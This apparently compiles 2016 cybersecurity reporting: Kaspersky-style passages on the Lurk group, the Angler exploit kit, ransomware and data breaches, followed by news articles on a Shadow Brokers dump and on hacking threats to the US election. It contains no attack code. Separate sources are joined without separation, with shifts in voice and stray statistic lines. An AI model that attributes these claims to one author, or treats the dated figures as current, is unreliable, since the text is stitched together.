It seems that those responsible for the Ammyy Admin website breach were happy to sell their Trojan dropper to anyone who wanted to distribute malware from the compromised site. The banking Trojan wasn’t the only cybercriminal activity the Lurk group was involved in.

The group also developed the Angler exploit kit, a set of malicious programs designed to exploit vulnerabilities in widespread software to install malware.

This exploit kit was originally developed to provide a reliable and effective delivery channel for the group’s malware. However, in 2013 the group started to rent out the kit to anyone who was willing to pay for it – probably to help pay for the group’s huge network infrastructure and large number of ‘staff’.

The Angler exploit kit became one of the most powerful tools available on the criminal underground. Unlike the Lurk banking Trojan, which focused on victims in Russia, Angler has been used by attackers across the world – including the groups behind the CryptXXX and TeslaCrypt ransomware and the Neverquest banking Trojan (the latter was used against almost 100 banks).

The operations of Angler were disrupted after the arrest of the alleged members of the Lurk group.

In Q3 2016, 45.2M unique malicious URLs were recognized by @kaspersky web antivirus components.

The group was involved in other side activities too.

For more than five years, the group moved from developing very powerful malware for automated money theft with Remote Banking Services software, to sophisticated theft involving SIM-card swap fraud, to becoming hacking specialists familiar with the internal infrastructure of banks. Kaspersky Lab provided assistance to the Russian police in the investigation into the group behind the Lurk Trojan.

The arrests marked the culmination of a six-year investigation by our Computer Incidents Investigation Team. You can read about the investigation here.

Ransomware

Hardly a month goes by without reports of ransomware attacks in the media: for example, a recent report suggested that 28 NHS trusts in the UK have fallen victim to ransomware in the last 12 months. Most ransomware attacks are directed at consumers, but a significant proportion target businesses (around 13 per cent in 2015-16).

The Kaspersky Lab IT Security Risks Survey 2016 indicated that around 42 per cent of small and medium businesses became victims of ransomware in the 12 months up to August 2016. One recent ransomware campaign demanded a massive two bitcoins (around $1,300) as a ransom.

The ransomware program, named Ded Cryptor, changes the wallpaper on the victim’s computer to a picture of an evil-looking Santa Claus. The modus operandi of this program (i.e. encrypted files, scary image, and ransom demand) is unremarkable, but the pre-history of this attack is interesting.
It is based on the EDA2 open-source ransomware code, developed by Utku Sen as part of a failed experiment. Utku Sen, a security expert from Turkey, created a ransomware program and published the code online. He realized that cybercriminals would use the code to create their own cryptors, but hoped that this would help security researchers to understand how cybercriminals think and code, thereby making their own efforts to block ransomware more effective. Ded Cryptor was just one of many ransomware programs spawned by EDA2.

Another such program that we saw recently was Fantom.

This was interesting not just because of its connection to EDA2, but because it simulates a genuine-looking Windows update screen. This is displayed while Fantom is encrypting the victim’s files in the background.

The fake update program runs in full-screen mode, visually blocking access to other programs and distracting the victim from what’s really happening. Once the encryption has been completed, Fantom displays a more typical message. There’s no doubt that public awareness of the problem is growing, but it’s clear that consumers and organizations alike are not doing enough to combat the threat; and cybercriminals are capitalising on this – this is clearly reflected in the growing number of ransomware attacks. It’s important to reduce your exposure to ransomware (and we’ve outlined important steps you can take here and here). However, there’s no such thing as 100 per cent security, so it’s also important to mitigate the risk.
In particular, it’s vital to ensure that you have a backup, to avoid facing a situation where the only choices are to pay the cybercriminals or lose your data.
It’s never advisable to pay the ransom.

In Q3 2016, @kaspersky web antivirus detected 12,657,673 unique malicious objects.

If you do find yourself in a situation where your files are encrypted and you don’t have a backup, ask your anti-malware vendor if they can help and check the No More Ransom website, to see if it holds the keys to decrypt your data.

This is a joint initiative by the National High Tech Crime Unit of the Netherlands’ police, Europol’s European Cybercrime Centre, Kaspersky Lab and Intel Security – designed to help victims of ransomware retrieve their encrypted data without paying cybercriminals. In a recent ‘ask the expert’ session, Jornt van der Wiel, an expert from Kaspersky Lab’s Global Research and Analysis Team, provided useful insights into ransomware.

Data breaches

Personal information is a valuable commodity, so it’s no surprise that cybercriminals target online providers, looking for ways to bulk-steal data in a single attack. We’ve become accustomed to the steady stream of security breaches reported in the media.

This quarter has been no exception, with data leaks from the official forum of DotA 2, Yahoo and others. Some of these attacks resulted in the theft of huge amounts of data, highlighting the fact that many companies are failing to take adequate steps to defend themselves.

Any organization that holds personal data has a duty of care to secure it effectively.

This includes hashing and salting customer passwords and encrypting other sensitive data. Consumers can limit the damage of a security breach at an online provider by ensuring that they choose passwords that are unique and complex: an ideal password is at least 15 characters long and consists of a mixture of letters, numbers and symbols from the entire keyboard.

As an alternative, people can use a password manager application to handle all this for them automatically. It’s also a good idea to use two-factor authentication, where an online provider offers this feature – requiring customers to enter a code generated by a hardware token, or one sent to a mobile device, in order to access a site, or at least in order to make changes to account settings. Given the potential impact of a security breach, it’s hardly surprising to see regulatory authorities paying closer attention to the issue.

The UK Information Commissioner’s Office (ICO) recently issued a record fine of £400,000 to Talk Talk for the company’s ‘failure to implement the most basic cyber security measures’, related to the attack on the company in October 2015.
In the view of the ICO, the record fine ‘acts as a warning to others that cyber security is not an IT issue, it is a boardroom issue’. The EU General Data Protection Regulation (GDPR), which comes into force in May 2018, will require companies to notify the regulator of data breaches, with significant fines for failure to secure personal data. You can find an overview of the regulation here. We took a look back at the impact of the Ashley Madison breach, one year after the attack that led to the leak of customer data, offering some good tips to anyone who might be considering looking online for love (and good advice for managing any online account).

Shadow Brokers dump reveals NSA targets

Accompanying gibberish encourages disrupting US election

The Shadow Brokers hacking group has posted a fresh dump containing a list of servers compromised by an NSA-linked group. The list contains historic targets of the Equation Group. Mail providers, universities and targets in China make up the bulk of the roster.

Each was a target of INTONATION and PITCHIMPAIR, codenames for cyber-spy hacking programmes. Documents leaked by whistleblower Edward Snowden provide strong evidence that previous dumps by the Shadow Brokers feature malware and exploits that originated at the NSA, as previously reported.

The latest Shadow Brokers dump was signed using the same key as the initial dump of NSA exploits, which the Shadow Brokers unsuccessfully tried to auction off.

A message accompanying the latest dump somewhat incoherently calls for attempts to disrupt the forthcoming US presidential election. This poorly argued rabble-rousing has been met with some derision.
Security experts have questioned the value of the leaked target list, at least outside the realm of cyber-espionage historians. "The list of servers is nine years old. [Many] likely no longer exist or [are] reinstalled," said security researcher Kevin Beaumont, in an update on Twitter.

Democralypse Now? US election first battle in new age of cyberwarfare

CIA said to blame Russia for voter database hacks

Hacking attempts against more than 10 US state election databases have increased fears about Russian efforts to disrupt or influence the 2016 presidential election. Cyberattacks against voting databases in Arizona, Illinois and at least eight other states have only heightened concerns in the wake of the hack and subsequent leak of emails from the Democratic National Congress. The US government has not shied from pointing the finger of blame firmly towards Moscow, as previously reported.

The Russian government "directed the recent compromises of emails from US persons and institutions," the Department of Homeland Security and the Office of the Director of National Intelligence alleged earlier this month. US security agencies are publicly accusing Russia of trying to interfere with the election process after allegedly escalating from cyber-espionage to cyber-sabotage. Federal officials suspect Russian hackers tried to breach a contractor for Florida's election system, exposing voters' personal information in the process, CNN reports. Amid these heightened tensions, the CIA is reportedly preparing for cyberwar against Russia, or at least looking into scenarios for a conflict largely fought in the arena of public opinion, where leaks of sensitive information on rival political elites are the weapons of choice.

Spin cycle

Accusations are flying left, right, and centre as experts urge calm assessment and caution.

Tod Beardsley, senior research manager at Rapid7, likened attempts to hack the election system to the routine scanning and probing of corporate networks. “There is wide speculation around the current ‘probing’ activity directed at online voter registration sites,” he said. “In isolation, this might seem alarming. However, all online systems are ‘probed’ all the time.

Automated and routine vulnerability scans of internet assets are a normal part of online weather, are sourced from all over the world, and are well understood by experienced IT security practitioners.” Even if voter record databases were corrupted, the effect would be disruptive rather than disastrous, according to Beardsley. “If online voter registration records are vandalised on election day in order to deregister otherwise legitimate voters, polling places can and will fall back to the paper-based provisional balloting system guaranteed by the Help America Vote Act of 2002 (HAVA).
So, while an outage of voter registration records would certainly be inconvenient, it would not prevent the election from taking place.
It just wouldn't be worthwhile in terms of effort, cost, and risk to attack elections this way, given the ease of local recovery through provisional balloting."

Vote early, vote often

The presidential election is now only two weeks away and this has served to heighten speculation – present during every recent election cycle – over the possibility of someone "hacking the election". Hackers have been threatening to steal voting results data as well as voters’ personal information.

The MIT Technology Review concludes that “voter registration information” is more at risk than your ballot. Tim Erlin, senior director of product management at Tripwire, said the 2016 US presidential elections are the “first major election where foreign cyberattacks have been discussed as a material threat”, something he expects to become the norm. “There’s no more business as usual when it comes to cybersecurity and US elections,” Erlin said. “The United States is going to have to come to grips with a future where electronic interference in elections by foreign powers is standard operating procedure.” Even apparently minor problems in election systems need to be scrutinised closely. “The information security community has learned over and over that the first discovery of a breach never uncovers the full scope,” Erlin warned. “We should apply that lesson to any election related compromises as well.

There’s likely more to uncover here as well.” Robert McFarlane, head of labs at Head London, commented: “The levels of hysteria and hyperbole have been the highest of any US election in living memory, but it’s certainly not inconceivable that we could see some high-stakes hacking. However, I’d suggest the underlying reasons behind this would be geopolitical: these elections have made the US look weak on the global stage and Putin desperately needs to deflect from the Syrian campaign.

As such, a Russian-sponsored hack would serve to humiliate and destabilise an already shaky America. “Of course, it also doesn’t help that Trump’s babbling rhetoric actively appears to invite outside interference to help secure his victory – or at the very least call a defeat into question.

There are, clearly, a great many ways a hack could backfire on Trump, as well as the sponsor – whether that’s external or domestic.
In fact, being able to point the finger of blame at the Russian Federation (or any state they don’t like) would be a convenient win for the Yanks by further isolating the perpetrator as an aggressive opponent of democracy.”

Democralypse Now?

Rapid7’s Beardsley has published a detailed blog on the hacking threats facing the US election system here. The US election system is “massively complex” and “appears to embody the absolute worst practices when it comes to information security”, he writes. There are cleartext, internet-based entry points to the voting system.

There is an ageing installed base of voting machines running proprietary, closed-source code, produced by many vendors.

And there is a bizarrely distributed model of authority over the election, where no one actually has the power to enforce a common set of security standards. Despite this assessment, Beardsley is inclined to downplay the widely discussed hacking threat against voting machines. “It is possible that foreign hackers could infiltrate voting machine software, and therefore cause votes cast for one candidate to be counted for another,” Beardsley said. “However, such an attack is literally incredible.
Voting machines in the US are never [as far as we are aware] directly connected to the internet on Election Day, which means the attacker would need to get at the machines well before November 8, while the software is being written or loaded on to the machines. “While this sort of infiltration is possible, such a campaign would require formidable espionage assets, have a high risk of being detected before the election, and the effects would be noticeable in bizarrely inaccurate exit polling during and after the election.”